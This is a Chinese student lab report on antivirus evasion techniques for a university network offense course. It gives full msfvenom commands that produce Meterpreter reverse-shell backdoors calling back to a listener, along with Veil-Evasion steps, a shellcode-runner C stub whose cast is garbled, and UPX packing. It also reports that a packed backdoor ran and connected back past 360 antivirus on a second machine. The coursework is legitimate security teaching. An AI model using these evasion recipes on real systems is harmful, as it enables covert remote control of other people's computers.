2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践

实践内容（3.5分）

1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）

1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)

（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

2.

基础问题回答

（1）杀软是如何检测出恶意代码的？

检测特征码、启发式恶意软件检查和行为。

（2）免杀是做什么？

通过一些手段伪装使恶意代码免遭杀软查杀。

（3）免杀的基本方法有哪些？

有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法或者更高级的特征码修改包括文件特征码修改和内存特征码修改。

实验过程

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧；

1、使用msf编码器

使用命令生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe



将生成的程序上传到virus total检测



上传virscan检测



使用msf编码器对后门程序编码10次

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe



然后再传到virus total上检测



上传virscan检测

2、使用msfvenom生成jar

使用命令生成.jar包

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar

上传virscan检测

3、使用msfvenom生成php

使用命令生成php文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php

上传virscan检测



(居然只有一个检测出来了，是谁呢？）



（卡巴斯基，牛皮！乌拉！！！（破音！））

4、使用veil-evasion

安装这个veil真的是，遇到提示别选Y手动安装，直接s(silent)静默安装，系统决定，一切随缘，手动安装的下场就是这样（ ⬜ ⬜ ⬜？ ⬜ ⬜。 ⬜ ⬜ ⬜！）



如果安装失败的，可以去usr/share/veil/config 下运行setup.sh 重新安装



最后安装成功的输入veil会有如下界面，然后输入use evasion进入evil-evasion输入命令use c/meterpreter/rev_tcp.py进入配置界面

set LHOST 192.168.70.131

set LPORT 5231

options

输入generate生成文件，接着输入你想要playload的名字



然后文件保存在/var/lib/veil/output/compiled/下，将生成文件提交扫描

任务二：Linux平台交叉编译Windows应用

5、利用shellcode编程

先执行shellcode生成命令得到shellcode



然后创建个.c文件将shellcode代码注入

“shellcode”

int main()

{

int (func)() = (int()())buf;

func();

}

执行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe生成可执行的后门程序

然后上传测一下



然后拖到主机上测试，被检测出禁止运行并且Windows defender自动清理掉了（我的电脑早在三年前就卸载了360,电脑管家之类的，三年来的苟活凭借的就是一身正气加上微软自带的Windows Defender，我觉得那些东西不会让我电脑比这个更安全只会让它更卡！！！）

6.加壳测试

使用c+shellcode+加压缩壳

实验环境：被控机是win10实体机，没有360和腾讯电脑管家，微软自带Windows defender防火墙杀毒全开。

原理：将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果

使用压缩壳（UPX）upx 20165231.exe -o wyhy5231.exe然后放到主机测试

放着不动或者用杀毒工具扫描就没有报警，一旦运行直接警告，并且直接被删

好的我错了，我以为就这么通过了没几分钟它就不见了！！！？？？系统又悄悄启动扫描一遍然后偷偷把文件给删了，然后再次放进主机共享文件夹就有危险报警了



为了完成反弹回连给他白名单吧，但是………………



好吧只有整个文件夹给设置为白名单吧（其实并没啥用，还是会被删，然后去威胁详细表里面手动恢复)

最后按照上次实验的步骤，我还是控制了我的win10主机，并且拍了个照，Windows defender也没有再干预。

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

免杀方法：先用msfvenom生成shellcode，再使用压缩壳进行加壳。

实验环境：对方电脑为 win7实体机，360 11.5.0.2002

本机打开msf控制台，开始监听，受控机运行后门程序

开启杀软能绝对防止电脑中恶意代码吗？

不能，此次简单的实验都逃过一劫（虽然有些地方暂时启用了白名单），高手总会想办法模拟一些正常软件的特征然后不断加壳加密或者更加高级的手段逃过杀软的查杀。

实验中遇到的问题

1、安装veil-evasion过程中出现很多弹窗提示你安装，但是里面的字却又是方框，编码错误显示不出来。

解决：在安装之除就选择s静默安装，一切由系统自己设置安排。

2、虚拟机ping不通别的实体机

解决：把虚拟机网卡设置改为桥接模式就可以了

实验感想

本次实验很长，很不好做，特别是veil，安装时间长，出错排查困难。经过这次实验我也认识到杀软也不是万能的，总会有病毒库里没出现过的新鲜玩意逃过一劫。想要电脑的安全就要做到自己不主动浏览不安全网站，不去下载不明软件，再加上杀软的一些防火墙功能，对于我们普通人来说还是很安全的。其次身边同学的实验也让我感受到360 和安全管家真是越来越** 了，好好一台电脑装了这玩意儿就卡卡卡死了！